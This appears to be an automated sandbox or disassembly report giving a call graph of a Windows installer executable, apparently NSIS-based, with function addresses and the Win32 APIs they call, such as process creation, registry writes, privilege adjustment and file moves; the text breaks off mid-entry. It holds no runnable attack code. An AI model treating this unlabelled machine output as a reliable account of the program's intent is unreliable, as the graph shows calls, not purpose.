4021ea 4966 402bbf 18 API calls 4965->4966 4967 4021f0 4966->4967 4968 402bbf 18 API calls 4967->4968 4969 4021f9 4968->4969 4970 402bbf 18 API calls 4969->4970 4971 402202 4970->4971 4972 406398 2 API calls 4971->4972 4973 40220b 4972->4973 4974 40221c lstrlenW lstrlenW 4973->4974 4978 40220f 4973->4978 4976 4051b4 25 API calls 4974->4976 4975 4051b4 25 API calls 4979 402217 4975->4979 4977 40225a SHFileOperationW 4976->4977 4977->4978 4977->4979 4978->4975 4978->4979 4980 40156b 4981 401584 4980->4981 4982 40157b ShowWindow 4980->4982 4983 401592 ShowWindow 4981->4983 4984 402a4c 4981->4984 4982->4981 4983->4984 4985 40456d 4986 4045a3 4985->4986 4987 40457d 4985->4987 4989 404180 8 API calls 4986->4989 4988 404119 19 API calls 4987->4988 4990 40458a SetDlgItemTextW 4988->4990 4991 4045af 4989->4991 4990->4986 4992 40226e 4993 402288 4992->4993 4994 402275 4992->4994 4995 406077 18 API calls 4994->4995 4996 402282 4995->4996 4997 40579a MessageBoxIndirectW 4996->4997 4997->4993 4998 402870 5020 405c2a GetFileAttributesW CreateFileW 4998->5020 5000 402877 5001 402883 GlobalAlloc 5000->5001 5002 40291a 5000->5002 5003 402911 CloseHandle 5001->5003 5004 40289c 5001->5004 5005 402922 DeleteFileW 5002->5005 5006 402935 5002->5006 5003->5002 5021 403258 SetFilePointer 5004->5021 5005->5006 5008 4028a2 5009 403242 ReadFile 5008->5009 5010 4028ab GlobalAlloc 5009->5010 5011 4028bb 5010->5011 5012 4028ef 5010->5012 5013 403027 32 API calls 5011->5013 5014 405cdc WriteFile 5012->5014 5019 4028c8 5013->5019 5015 4028fb GlobalFree 5014->5015 5016 403027 32 API calls 5015->5016 5017 40290e 5016->5017 5017->5003 5018 4028e6 GlobalFree 5018->5012 5019->5018 5020->5000 5021->5008 5022 4014f1 SetForegroundWindow 5023 402a4c 5022->5023 5024 401673 5025 402bbf 18 API calls 5024->5025 5026 40167a 5025->5026 5027 402bbf 18 API calls 5026->5027 5028 401683 5027->5028 5029 402bbf 18 API calls 5028->5029 5030 40168c MoveFileW 5029->5030 5031 40169f 5030->5031 5037 401698 5030->5037 5032 406398 2 API calls 5031->5032 5035 4021e1 5031->5035 5034 4016ae 5032->5034 5033 401423 25 API calls 5033->5035 5034->5035 5036 405ef6 38 API calls 5034->5036 5036->5037 5037->5033 5038 4052f3 5039 405314 GetDlgItem GetDlgItem GetDlgItem 5038->5039 5040 40549d 5038->5040 5083 40414e SendMessageW 5039->5083 5042 4054a6 GetDlgItem CreateThread CloseHandle 5040->5042 5043 4054ce 5040->5043 5042->5043 5045 4054f9 5043->5045 5046 4054e5 ShowWindow ShowWindow 5043->5046 5047 40551e 5043->5047 5044 405384 5049 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5044->5049 5048 405559 5045->5048 5051 405533 ShowWindow 5045->5051 5052 40550d 5045->5052 5085 40414e SendMessageW 5046->5085 5053 404180 8 API calls 5047->5053 5048->5047 5058 405567 SendMessageW 5048->5058 5056 4053f9 5049->5056 5057 4053dd SendMessageW SendMessageW 5049->5057 5054 405553 5051->5054 5055 405545 5051->5055 5059 4040f2 SendMessageW 5052->5059 5065 40552c 5053->5065 5061 4040f2 SendMessageW 5054->5061 5060 4051b4 25 API calls 5055->5060 5062 40540c 5056->5062 5063 4053fe SendMessageW 5056->5063 5057->5056 5064 405580 CreatePopupMenu 5058->5064 5058->5065 5059->5047 5060->5054 5061->5048 5067 404119 19 API calls 5062->5067 5063->5062 5066 406077 18 API calls 5064->5066 5068 405590 AppendMenuW 5066->5068 5069 40541c 5067->5069 5070 4055c0 TrackPopupMenu 5068->5070 5071 4055ad GetWindowRect 5068->5071 5072 405425 ShowWindow 5069->5072 5073 405459 GetDlgItem SendMessageW 5069->5073 5070->5065 5075 4055db 5070->5075 5071->5070 5076 405448 5072->5076 5077 40543b ShowWindow 5072->5077 5073->5065 5074 405480 SendMessageW SendMessageW 5073->5074 5074->5065 5078 4055f7 SendMessageW 5075->5078 5084 40414e SendMessageW 5076->5084 5077->5076 5078->5078 5079 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5078->5079 5081 405639 SendMessageW 5079->5081 5081->5081 5082 405662 GlobalUnlock SetClipboardData CloseClipboard 5081->5082 5082->5065 5083->5044 5084->5073 5085->5045 5086 100016b6 5087 100016e5 5086->5087 5088 10001b18 22 API calls 5087->5088 5089 100016ec 5088->5089 5090 100016f3 5089->5090 5091 100016ff 5089->5091 5092 10001272 2 API calls 5090->5092 5093 10001726 5091->5093 5094 10001709 5091->5094 5097 100016fd 5092->5097 5095 10001750 5093->5095 5096 1000172c 5093->5096 5098 1000153d 3 API calls 5094->5098 5100 1000153d 3 API calls 5095->5100 5099 100015b4 3 API calls 5096->5099 5101 1000170e 5098->5101 5102 10001731 5099->5102 5100->5097 5103 100015b4 3 API calls 5101->5103 5104 10001272 2 API calls 5102->5104 5105 10001714 5103->5105 5107 10001737 GlobalFree 5104->5107 5106 10001272 2 API calls 5105->5106 5108 1000171a GlobalFree 5106->5108 5107->5097 5109 1000174b GlobalFree 5107->5109 5108->5097 5109->5097 5110 10002238 5111 10002296 5110->5111 5112 100022cc 5110->5112 5111->5112 5113 100022a8 GlobalAlloc 5111->5113 5113->5111 5114 401cfa GetDlgItem GetClientRect 5115 402bbf 18 API calls 5114->5115 5116 401d2c LoadImageW SendMessageW 5115->5116 5117 401d4a DeleteObject 5116->5117 5118 402a4c 5116->5118 5117->5118 4744 4027fb 4745 402bbf 18 API calls 4744->4745 4746 402802 FindFirstFileW 4745->4746 4747 402815 4746->4747 4748 40282a 4746->4748 4749 402833 4748->4749 4752 405f9c wsprintfW 4748->4752 4753 406055 lstrcpynW 4749->4753 4752->4749 4753->4747 4754 40237b 4755 402381 4754->4755 4756 402bbf 18 API calls 4755->4756 4757 402393 4756->4757 4758 402bbf 18 API calls 4757->4758 4759 40239d RegCreateKeyExW 4758->4759 4760 4023c7 4759->4760 4761 40281e 4759->4761 4762 4023e2 4760->4762 4763 402bbf 18 API calls 4760->4763 4764 4023ee 4762->4764 4766 402ba2 18 API calls 4762->4766 4765 4023d8 lstrlenW 4763->4765 4767 402409 RegSetValueExW 4764->4767 4768 403027 32 API calls 4764->4768 4765->4762 4766->4764 4769 40241f RegCloseKey 4767->4769 4768->4767 4769->4761 5119 1000103d 5120 1000101b 5 API calls 5119->5120 5121 10001056 5120->5121 5122 4014ff 5123 401507 5122->5123 5125 40151a 5122->5125 5124 402ba2 18 API calls 5123->5124 5124->5125 5126 401000 5127 401037 BeginPaint GetClientRect 5126->5127 5128 40100c DefWindowProcW 5126->5128 5129 4010f3 5127->5129 5131 401179 5128->5131 5132 401073 CreateBrushIndirect FillRect DeleteObject 5129->5132 5133 4010fc 5129->5133 5132->5129 5134 401102 CreateFontIndirectW 5133->5134 5135 401167 EndPaint 5133->5135 5134->5135 5136 401112 6 API calls 5134->5136 5135->5131 5136->5135 5137 401904 5138 40193b 5137->5138 5139 402bbf 18 API calls 5138->5139 5140 401940 5139->5140 5141 405846 69 API calls 5140->5141 5142 401949 5141->5142 5143 402d04 5144 402d16 SetTimer 5143->5144 5145 402d2f 5143->5145 5144->5145 5146 402d84 5145->5146 5147 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5145->5147 5147->5146 4503 402786 4504 40278d 4503->4504 4507 4029f7 4503->4507 4505 402ba2 18 API calls 4504->4505 4506 402798 4505->4506 4508 40279f SetFilePointer 4506->4508 4508->4507 4509 4027af 4508->4509 4511 405f9c wsprintfW 4509->4511 4511->4507 4554 100027c7 4555 10002817 4554->4555 4556 100027d7 VirtualProtect 4554->4556 4556->4555 5148 401907 5149 402bbf 18 API calls 5148->5149 5150 40190e 5149->5150 5151 40579a MessageBoxIndirectW 5150->5151 5152 401917 5151->5152 5153 401e08 5154 402bbf 18 API calls 5153->5154 5155 401e0e 5154->5155 5156 402bbf 18 API calls 5155->5156 5157 401e17 5156->5157 5158 402bbf 18 API calls 5157->5158 5159 401e20 5158->5159 5160 402bbf 18 API calls 5159->5160 5161 401e29 5160->5161 5162 401423 25 API calls 5161->5162 5163 401e30 ShellExecuteW 5162->5163 5164 401e61 5163->5164 5170 40490a 5171 404936 5170->5171 5172 40491a 5170->5172 5173 404969 5171->5173 5174 40493c SHGetPathFromIDListW 5171->5174 5181 40577e GetDlgItemTextW 5172->5181 5176 40494c 5174->5176 5180 404953 SendMessageW 5174->5180 5178 40140b 2 API calls 5176->5178 5177 404927 SendMessageW 5177->5171 5178->5180 5180->5173 5181->5177 5182 1000164f 5183 10001516 GlobalFree 5182->5183 5185 10001667 5183->5185 5184 100016ad GlobalFree 5185->5184 5186 10001682 5185->5186 5187 10001699 VirtualFree 5185->5187 5186->5184 5187->5184 4679 402095 4680 402bbf 18 API calls 4679->4680 4681 40209c 4680->4681 4682 402bbf 18 API calls 4681->4682 4683 4020a6 4682->4683 4684 402bbf 18 API calls 4683->4684 4685 4020b0 4684->4685 4686 402bbf 18 API calls 4685->4686 4687 4020ba 4686->4687 4688 402bbf 18 API calls 4687->4688 4690 4020c4 4688->4690 4689 402103 CoCreateInstance 4694 402122 4689->4694 4690->4689 4691 402bbf 18 API calls 4690->4691 4691->4689 4692 401423 25 API calls 4693 4021e1 4692->4693 4694->4692 4694->4693 5188 401a15 5189 402bbf 18 API calls 5188->5189 5190 401a1e ExpandEnvironmentStringsW 5189->5190 5191 401a32 5190->5191 5193 401a45 5190->5193 5192 401a37 lstrcmpW 5191->5192 5191->5193 5192->5193 5194 402515 5195 402bbf 18 API calls 5194->5195 5196 40251c 5195->5196 5199 405c2a GetFileAttributesW CreateFileW 5196->5199 5198 402528 5199->5198 5200 401b16 5201 402bbf 18 API calls 5200->5201 5202 401b1d 5201->5202 5203 402ba2 18 API calls 5202->5203 5204 401b26 wsprintfW 5203->5204 5205 402a4c 5204->5205 5206 10001058 5208 10001074 5206->5208 5207 100010dd 5208->5207 5209 10001516 GlobalFree 5208->5209 5210 10001092 5208->5210 5209->5210 5211 10001516 GlobalFree 5210->5211 5212 100010a2 5211->5212 5213 100010b2 5212->5213 5214 100010a9 GlobalSize 5212->5214 5215 100010b6 GlobalAlloc 5213->5215 5216 100010c7 5213->5216 5214->5213 5217 1000153d 3 API calls 5215->5217 5218 100010d2 GlobalFree 5216->5218 5217->5216 5218->5207 4771 40159b 4772 402bbf 18 API calls 4771->4772 4773 4015a2 SetFileAttributesW 4772->4773 4774 4015b4 4773->4774 4783 40229d 4784 4022a5 4783->4784 4785 4022ab 4783->4785 4786 402bbf 18 API calls 4784->4786 4787 402bbf 18 API calls 4785->4787 4788 4022b9 4785->4788 4786->4785 4787->4788 4789 4022c7 4788->4789 4791 402bbf 18 API calls 4788->4791 4790 402bbf 18 API calls 4789->4790 4792 4022d0 WritePrivateProfileStringW 4790->4792 4791->4789 5219 401f1d 5220 402bbf 18 API calls 5219->5220 5221 401f24 5220->5221 5222 40642b 5 API calls 5221->5222 5223 401f33 5222->5223 5224 401f4f GlobalAlloc 5223->5224 5233 401fb7 5223->5233 5225 401f63 5224->5225 5224->5233 5226 40642b 5 API calls 5225->5226 5227 401f6a 5226->5227 5228 40642b 5 API calls 5227->5228 5229 401f74 5228->5229 5229->5233 5234 405f9c wsprintfW 5229->5234 5231 401fa9 5235 405f9c wsprintfW 5231->5235 5234->5231 5235->5233 5236 40149e 5237 402288 5236->5237 5238 4014ac PostQuitMessage 5236->5238 5238->5237 5239 40249e 5240 402cc9 19 API calls 5239->5240 5241 4024a8 5240->5241 5242 402ba2 18 API calls 5241->5242 5243 4024b1 5242->5243 5244 4024d5 RegEnumValueW 5243->5244 5245 4024c9 RegEnumKeyW 5243->5245 5246 40281e 5243->5246 5244->5246 5247 4024ee RegCloseKey 5244->5247 5245->5247 5247->5246 5249 40231f 5250 402324 5249->5250 5251 40234f 5249->5251 5252 402cc9 19 API calls 5250->5252 5253 402bbf 18 API calls 5251->5253 5255 40232b 5252->5255 5254 402356 5253->5254 5260 402bff RegOpenKeyExW 5254->5260 5256 402bbf 18 API calls 5255->5256 5259 40236c 5255->5259 5258 40233c RegDeleteValueW RegCloseKey 5256->5258 5258->5259 5261 402c76 5260->5261 5266 402c2a 5260->5266 5261->5259 5262 402c50 RegEnumKeyW 5263 402c62 RegCloseKey 5262->5263 5262->5266 5264 40642b 5 API calls 5263->5264 5267 402c72 5264->5267 5265 402c87 RegCloseKey 5265->5261 5266->5262 5266->5263 5266->5265 5268 402bff 5 API calls 5266->5268 5267->5261 5269 402ca2 RegDeleteKeyW 5267->5269 5268->5266 5269->5261 3707 4032a0 SetErrorMode GetVersion 3708 4032d4 3707->3708 3709 4032da 3707->3709 3711 40642b 5 API calls 3708->3711 3798 4063bf GetSystemDirectoryW 3709->3798 3711->3709 3712 4032f1 3713 4063bf 3 API calls 3712->3713 3714 4032fb 3713->3714 3715 4063bf 3 API calls 3714->3715 3716 403305 3715->3716 3801 40642b GetModuleHandleA 3716->3801 3719 40642b 5 API calls 3720 403313 #17 OleInitialize SHGetFileInfoW 3719->3720 3807 406055 lstrcpynW 3720->3807 3722 403350 GetCommandLineW 3808 406055 lstrcpynW 3722->3808 3724 403362 GetModuleHandleW 3725 40337a 3724->3725 3809 405a36 3725->3809 3728 4034b4 GetTempPathW 3813 40326f 3728->3813 3730 4034cc 3731 4034d0 GetWindowsDirectoryW lstrcatW 3730->3731 3732 403526 DeleteFileW 3730->3732 3733 40326f 12 API calls 3731->3733 3823 402dee GetTickCount GetModuleFileNameW 3732->3823 3737 4034ec 3733->3737 3734 405a36 CharNextW 3736 4033a2 3734->3736 3736->3734 3741 40349f 3736->3741 3742 40349d 3736->3742 3737->3732 3739 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3737->3739 3738 40353a 3746 405a36 CharNextW 3738->3746 3780 4035dd 3738->3780 3793 4035ed 3738->3793 3740 40326f 12 API calls 3739->3740 3744 40351e 3740->3744 3907 406055 lstrcpynW 3741->3907 3742->3728 3744->3732 3744->3793 3763 403559 3746->3763 3749 403728 3752 403730 GetCurrentProcess OpenProcessToken 3749->3752 3753 4037ac ExitProcess 3749->3753 3750 403608 3931 40579a 3750->3931 3758 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3752->3758 3759 40377c 3752->3759 3756 4035b7 3908 405b11 3756->3908 3757 40361e 3935 40571d 3757->3935 3758->3759 3762 40642b 5 API calls 3759->3762 3766 403783 3762->3766 3763->3756 3763->3757 3769 403798 ExitWindowsEx 3766->3769 3772 4037a5 3766->3772 3767 403634 lstrcatW 3768 40363f lstrcatW lstrcmpiW 3767->3768 3771 40365b 3768->3771 3768->3793 3769->3753 3769->3772 3774 403660 3771->3774 3775 403667 3771->3775 3973 40140b 3772->3973 3773 4035d2 3923 406055 lstrcpynW 3773->3923 3938 405683 CreateDirectoryW 3774->3938 3943 405700 CreateDirectoryW 3775->3943 3851 40389e 3780->3851 3782 40366c SetCurrentDirectoryW 3783 403687 3782->3783 3784 40367c 3782->3784 3947 406055 lstrcpynW 3783->3947 3946 406055 lstrcpynW 3784->3946 3789 4036d3 CopyFileW 3795 403695 3789->3795 3790 40371c 3791 405ef6 38 API calls 3790->3791 3791->3793 3924 4037c4 3793->3924 3794 406077 18 API calls 3794->3795 3795->3790 3795->3794 3797 403707 CloseHandle 3795->3797 3948 406077 3795->3948 3966 405ef6 MoveFileExW 3795->3966 3970 405735 CreateProcessW 3795->3970 3797->3795 3799 4063e1 wsprintfW LoadLibraryW 3798->3799 3799->3712 3802 406451 GetProcAddress 3801->3802 3803 406447 3801->3803 3805 40330c 3802->3805 3804 4063bf 3 API calls 3803->3804 3806 40644d 3804->3806 3805->3719 3806->3802 3806->3805 3807->3722 3808->3724 3810 405a3c 3809->3810 3811 403389 CharNextW 3810->3811 3812 405a43 CharNextW 3810->3812 3811->3728 3811->3736 3812->3810 3976 4062e9 3813->3976 3815 403285 3815->3730 3816 40327b 3816->3815 3985 405a09 lstrlenW CharPrevW 3816->3985 3819 405700 2 API calls 3820 403293 3819->3820 3988 405c59 3820->3988 3992 405c2a GetFileAttributesW CreateFileW 3823->3992 3825 402e2e 3850 402e3e 3825->3850 3993 406055 lstrcpynW 3825->3993 3827 402e54 3994 405a55 lstrlenW 3827->3994 3831 402e65 GetFileSize 3832 402f61 3831->3832 3849 402e7c 3831->3849 3999 402d8a 3832->3999 3834 402f6a 3836 402f9a GlobalAlloc 3834->3836 3834->3850 4034 403258 SetFilePointer 3834->4034 4010 403258 SetFilePointer 3836->4010 3838 402fcd 3840 402d8a 6 API calls 3838->3840 3840->3850 3841 402f83 3843 403242 ReadFile 3841->3843 3842 402fb5 4011 403027 3842->4011 3845 402f8e 3843->3845 3845->3836 3845->3850 3846 402d8a 6 API calls 3846->3849 3847 402fc1 3847->3847 3848 402ffe SetFilePointer 3847->3848 3847->3850 3848->3850 3849->3832 3849->3838 3849->3846 3849->3850 4031 403242 3849->4031 3850->3738 3852 40642b 5 API calls 3851->3852 3853 4038b2 3852->3853 3854 4038b8 GetUserDefaultUILanguage 3853->3854 3855 4038ca 3853->3855 4055 405f9c wsprintfW 3854->4055 4065 405f22 RegOpenKeyExW 3855->4065 3859 4038c8 4056 403b74 3859->4056 3860 403919 lstrcatW 3860->3859 3862 405f22 3 API calls 3862->3860 3864 405b11 18 API calls 3865 40394b 3864->3865 3866 4039df 3865->3866 3868 405f22 3 API calls 3865->3868 3867 405b11 18 API calls 3866->3867 3869 4039e5 3867->3869 3870 40397d 3868->3870 3871 4039f5 LoadImageW 3869->3871 3872 406077 18 API calls 3869->3872 3870->3866 3876 40399e lstrlenW 3870->3876 3879 405a36 CharNextW 3870->3879 3873 403a9b 3871->3873 3874 403a1c RegisterClassW 3871->3874 3872->3871 3875 40140b 2 API calls 3873->3875 3877 403a52 SystemParametersInfoW CreateWindowExW 3874->3877 3906 403aa5 3874->3906 3878 403aa1 3875->3878 3880 4039d2 3876->3880 3881 4039ac lstrcmpiW 3876->3881 3877->3873 3886 403b74 19 API calls 3878->3886 3878->3906 3884 40399b 3879->3884 3883 405a09 3 API calls 3880->3883 3881->3880 3882 4039bc GetFileAttributesW 3881->3882 3885 4039c8 3882->3885 3887 4039d8 3883->3887 3884->3876 3885->3880 3888 405a55 2 API calls 3885->3888 3889 403ab2 3886->3889 4070 406055 lstrcpynW 3887->4070 3888->3880 3891 403b41 3889->3891 3892 403abe ShowWindow 3889->3892 4071 405287 OleInitialize 3891->4071 3894 4063bf 3 API calls 3892->3894 3896 403ad6 3894->3896 3895 403b47 3897 403b63 3895->3897 3898 403b4b 3895->3898 3899 403ae4 GetClassInfoW 3896->3899 3901 4063bf 3 API calls 3896->3901 3900 40140b 2 API calls 3897->3900 3904 40140b 2 API calls 3898->3904 3898->3906 3902 403af8 GetClassInfoW RegisterClassW 3899->3902 3903 403b0e DialogBoxParamW 3899->3903 3900->3906 3901->3899 3902->3903 3905 40140b 2 API calls 3903->3905 3904->3906 3905->3906 3906->3793 3907->3742 4086 406055 lstrcpynW 3908->4086 3910 405b22 4087 405ab4 CharNextW CharNextW 3910->4087 3913 4035c3 3913->3793 3922 406055 lstrcpynW 3913->3922 3914 4062e9 5 API calls 3920 405b38 3914->3920 3915 405b69 lstrlenW 3916 405b74 3915->3916 3915->3920 3918 405a09 3 API calls 3916->3918 3919 405b79 GetFileAttributesW 3918->3919 3919->3913 3920->3913 3920->3915 3921 405a55 2 API calls 3920->3921 4093 406398 FindFirstFileW 3920->4093 3921->3915 3922->3773 3923->3780 3925 4037dc 3924->3925 3926 4037ce CloseHandle 3924->3926 4096 403809 3925->4096 3926->3925 3932 4057af 3931->3932 3933 403616 ExitProcess 3932->3933 3934 4057c3 MessageBoxIndirectW 3932->3934 3934->3933 3936 40642b 5 API calls 3935->3936 3937 403623 lstrcatW 3936->3937 3937->3767 3937->3768 3939 403665 3938->3939 3940 4056d4 GetLastError 3938->3940 3939->3782 3940->3939 3941 4056e3 SetFileSecurityW 3940->3941 3941->3939 3942 4056f9 GetLastError 3941->3942 3942->3939 3944 405710 3943->3944 3945 405714 GetLastError 3943->3945 3944->3782 3945->3944 3946->3783 3947->3795 3963 406084 3948->3963 3949 4062cf 3950 4036c6 DeleteFileW 3949->3950 4155 406055 lstrcpynW 3949->4155 3950->3789 3950->3795 3952 406137 GetVersion 3952->3963 3953 40629d lstrlenW 3953->3963 3954 406077 10 API calls 3954->3953 3957 4061b2 GetSystemDirectoryW 3957->3963 3958 405f22 3 API calls 3958->3963 3959 4061c5 GetWindowsDirectoryW 3959->3963 3960 4062e9 5 API calls 3960->3963 3961 406077 10 API calls 3961->3963 3962 40623e lstrcatW 3962->3963 3963->3949 3963->3952 3963->3953 3963->3954 3963->3957 3963->3958 3963->3959 3963->3960 3963->3961 3963->3962 3964 4061f9 SHGetSpecialFolderLocation 3963->3964 4153 405f9c wsprintfW 3963->4153 4154 406055 lstrcpynW 3963->4154 3964->3963 3965 406211 SHGetPathFromIDListW CoTaskMemFree 3964->3965 3965->3963 3967 405f17 3966->3967 3968 405f0a 3966->3968 3967->3795 4156 405d84 lstrcpyW 3968->4156 3971 405774 3970->3971 3972 405768 CloseHandle 3970->3972 3971->3795 3972->3971 3974 401389 2 API calls 3973->3974 3975 401420 3974->3975 3975->3753 3983 4062f6 3976->3983 3977 406371 CharPrevW 3981 40636c 3977->3981 3978 40635f CharNextW 3978->3981 3978->3983 3979 406392 3979->3816 3980 405a36 CharNextW 3980->3983 3981->3977 3981->3979 3982 40634b CharNextW 3982->3983 3983->3978 3983->3980 3983->3981 3983->3982 3984 40635a CharNextW 3983->3984 3984->3978 3986 40328d 3985->3986 3987 405a25 lstrcatW 3985->3987 3986->3819 3987->3986 3989 405c66 GetTickCount GetTempFileNameW 3988->3989 3990 40329e 3989->3990 3991 405c9c 3989->3991 3990->3730 3991->3989 3991->3990 3992->3825 3993->3827 3995 405a63 3994->3995 3996 402e5a 3995->3996 3997 405a69 CharPrevW 3995->3997 3998 406055 lstrcpynW 3996->3998 3997->3995 3997->3996 3998->3831 4000 402d93 3999->4000 4001 402dab 3999->4001 4004 402da3 4000->4004 4005 402d9c DestroyWindow 4000->4005 4002 402db3 4001->4002 4003 402dbb GetTickCount 4001->4003 4035 406467 4002->4035 4007 402dc9 CreateDialogParamW ShowWindow 4003->4007 4008 402dec 4003->4008 4004->3834 4005->4004 4007->4008 4008->3834 4010->3842 4012 403040 4011->4012 4013 40306e 4012->4013 4041 403258 SetFilePointer 4012->4041 4015 403242 ReadFile 4013->4015 4016 403079 4015->4016 4017 4031db 4016->4017 4018 40308b GetTickCount 4016->4018 4026 4031c5 4016->4026 4019 40321d 4017->4019 4020 4031df 4017->4020 4018->4026 4030 4030da 4018->4030 4022 403242 ReadFile 4019->4022 4023 403242 ReadFile 4020->4023 4024 405cdc WriteFile 4020->4024 4020->4026 4021 403242 ReadFile 4021->4030 4022->4026 4023->4020 4024->4020 4025 403130 GetTickCount 4025->4030 4026->3847 4027 403155 MulDiv wsprintfW 4042 4051b4 4027->4042 4030->4021 4030->4025 4030->4026 4030->4027 4039 405cdc WriteFile 4030->4039 4053 405cad ReadFile 4031->4053 4034->3841 4036 406484 PeekMessageW 4035->4036 4037 402db9 4036->4037 4038 40647a DispatchMessageW 4036->4038 4037->3834 4038->4036 4040 405cfa 4039->4040 4040->4030 4041->4013 4043 4051cf 4042->4043 4051 405271 4042->4051 4044 4051eb lstrlenW 4043->4044 4045 406077 18 API calls 4043->4045 4046 405214 4044->4046 4047 4051f9 lstrlenW 4044->4047 4045->4044 4049 405227 4046->4049 4050 40521a SetWindowTextW 4046->4050 4048 40520b lstrcatW 4047->4048 4047->4051 4048->4046 4049->4051 4052 40522d SendMessageW SendMessageW SendMessageW 4049->4052 4050->4049 4051->4030 4052->4051 4054 403255 4053->4054 4054->3849 4055->3859 4057 403b88 4056->4057 4078 405f9c wsprintfW 4057->4078 4059 403bf9 4060 406077 18 API calls 4059->4060 4061 403c05 SetWindowTextW 4060->4061 4062 403929 4061->4062 4063 403c21 4061->4063 4062->3864 4063->4062 4064 406077 18 API calls 4063->4064 4064->4063 4066 4038fa 4065->4066 4067 405f56 RegQueryValueExW 4065->4067 4066->3860 4066->3862 4068 405f77 RegCloseKey 4067->4068 4068->4066 4070->3866 4079 404165 4071->4079 4073 4052d1 4074 404165 SendMessageW 4073->4074 4075 4052e3 OleUninitialize 4074->4075 4075->3895 4076 4052aa 4076->4073 4082 401389 4076->4082 4078->4059 4080 40417d 4079->4080 4081 40416e SendMessageW 4079->4081 4080->4076 4081->4080 4083 401390 4082->4083 4084 4013fe 4083->4084 4085 4013cb MulDiv SendMessageW 4083->4085 4084->4076 4085->4083 4086->3910 4088 405ad1 4087->4088 4091 405ae3 4087->4091 4090 405ade CharNextW 4088->4090 4088->4091 4089 405b07 4089->3913 4089->3914 4090->4089 4091->4089 4092 405a36 CharNextW 4091->4092 4092->4091 4094 4063b9 4093->4094 4095 4063ae FindClose 4093->4095 4094->3920 4095->4094 4097 403817 4096->4097 4098 4037e1 4097->4098 4099 40381c FreeLibrary GlobalFree 4097->4099 4100 405846 4098->4100 4099->4098 4099->4099 4101 405b11 18 API calls 4100->4101 4102 405866 4101->4102 4103 405885 4102->4103 4104 40586e DeleteFileW 4102->4104 4106 4059b0 4103->4106 4140 406055 lstrcpynW 4103->4140 4105 4035f6 OleUninitialize 4104->4105 4105->3749 4105->3750 4106->4105 4113 406398 2 API calls 4106->4113 4108 4058ab 4109 4058b1 lstrcatW 4108->4109 4110 4058be 4108->4110 4111 4058c4 4109->4111 4112 405a55 2 API calls 4110->4112 4114 4058d4 lstrcatW 4111->4114 4115 4058ca 4111->4115 4112->4111 4116 4059ca 4113->4116 4118 4058df lstrlenW FindFirstFileW 4114->4118 4115->4114 4115->4118 4116->4105 4117 4059ce 4116->4117 4119 405a09 3 API calls 4117->4119 4120 4059a5 4118->4120 4138 405901 4118->4138 4121 4059d4 4119->4121 4120->4106 4123 4057fe 5 API calls 4121->4123 4122 405988 FindNextFileW 4126 40599e FindClose 4122->4126 4122->4138 4125 4059e0 4123->4125 4127 4059e4 4125->4127 4128 4059fa 4125->4128 4126->4120 4127->4105 4131 4051b4 25 API calls 4127->4131 4130 4051b4 25 API calls 4128->4130 4130->4105 4133 4059f1 4131->4133 4132 405846 62 API calls 4132->4138 4135 405ef6 38 API calls 4133->4135 4134 4051b4 25 API calls 4134->4122 4136 4059f8 4135->4136 4136->4105 4137 4051b4 25 API calls 4137->4138 4138->4122 4138->4132 4138->4134 4138->4137 4139 405ef6 38 API calls 4138->4139 4141 406055 lstrcpynW 4138->4141 4142 4057fe 4138->4142 4139->4138 4140->4108 4141->4138 4150 405c05 GetFileAttributesW 4142->4150 4145 40582b 4145->4138 4146 405821 DeleteFileW 4148 405827 4146->4148 4147 405819 RemoveDirectoryW 4147->4148 4148->4145 4149 405837 SetFileAttributesW 4148->4149 4149->4145 4151 40580a 4150->4151 4152 405c17 SetFileAttributesW 4150->4152 4151->4145 4151->4146 4151->4147 4152->4151 4153->3963 4154->3963 4155->3950 4157 405dd2 GetShortPathNameW 4156->4157 4158 405dac 4156->4158 4159 405ef1 4157->4159 4160 405de7 4157->4160 4183 405c2a GetFileAttributesW CreateFileW 4158->4183 4159->3967 4160->4159 4162 405def wsprintfA 4160->4162 4165 406077 18 API calls 4162->4165 4163 405db6 CloseHandle GetShortPathNameW 4163->4159 4164 405dca 4163->4164 4164->4157 4164->4159 4166 405e17 4165->4166 4184 405c2a GetFileAttributesW CreateFileW 4166->4184 4168 405e24 4168->4159 4169 405e33 GetFileSize GlobalAlloc 4168->4169 4170 405e55 4169->4170 4171 405eea CloseHandle 4169->4171 4172 405cad ReadFile 4170->4172 4171->4159 4173 405e5d 4172->4173 4173->4171 4185 405b8f lstrlenA 4173->4185 4176 405e74 lstrcpyA 4178 405e96 4176->4178 4177 405e88 4179 405b8f 4 API calls 4177->4179 4180 405ecd SetFilePointer 4178->4180 4179->4178 4181 405cdc WriteFile 4180->4181 4182 405ee3 GlobalFree 4181->4182 4182->4171 4183->4163 4184->4168 4186 405bd0 lstrlenA 4185->4186 4187 405bd8 4186->4187 4188 405ba9 lstrcmpiA 4186->4188 4187->4176 4187->4177 4188->4187 4189 405bc7 CharNextA 4188->4189 4189->4186 5270 100010e1 5279 10001111 5270->5279 5271 100011d8 GlobalFree 5272 100012ba 2 API calls 5272->5279 5273 100011d3 5273->5271 5274 100011f8 GlobalFree 5274->5279 5275 10001272 2 API calls 5278 100011c4 GlobalFree 5275->5278 5276 10001164 GlobalAlloc 5276->5279 5277 100012e1 lstrcpyW 5277->5279 5278->5279 5279->5271 5279->5272 5279->5273 5279->5274 5279->5275 5279->5276 5279->5277 5279->5278 5280 401ca3 5281 402ba2 18 API calls 5280->5281 5282 401ca9 IsWindow 5281->5282 5283 401a05 5282->5283 5284 402a27 SendMessageW 5285 402a41 InvalidateRect 5284->5285 5286 402a4c 5284->5286 5285->5286 4557 405128 4558 405138 4557->4558 4559 40514c 4557->4559 4560 405195 4558->4560 4561 40513e 4558->4561 4562 405154 IsWindowVisible 4559->4562 4568 405174 4559->4568 4563 40519a CallWindowProcW 4560->4563 4564 404165 SendMessageW 4561->4564 4562->4560 4565 405161 4562->4565 4566 405148 4563->4566 4564->4566 4571 404a7e SendMessageW 4565->4571 4568->4563 4576 404afe 4568->4576 4572 404aa1 GetMessagePos ScreenToClient SendMessageW 4571->4572 4573 404add SendMessageW 4571->4573 4574 404ada 4572->4574 4575 404ad5 4572->4575 4573->4575 4574->4573 4575->4568 4585 406055 lstrcpynW 4576->4585 4578 404b11 4586 405f9c 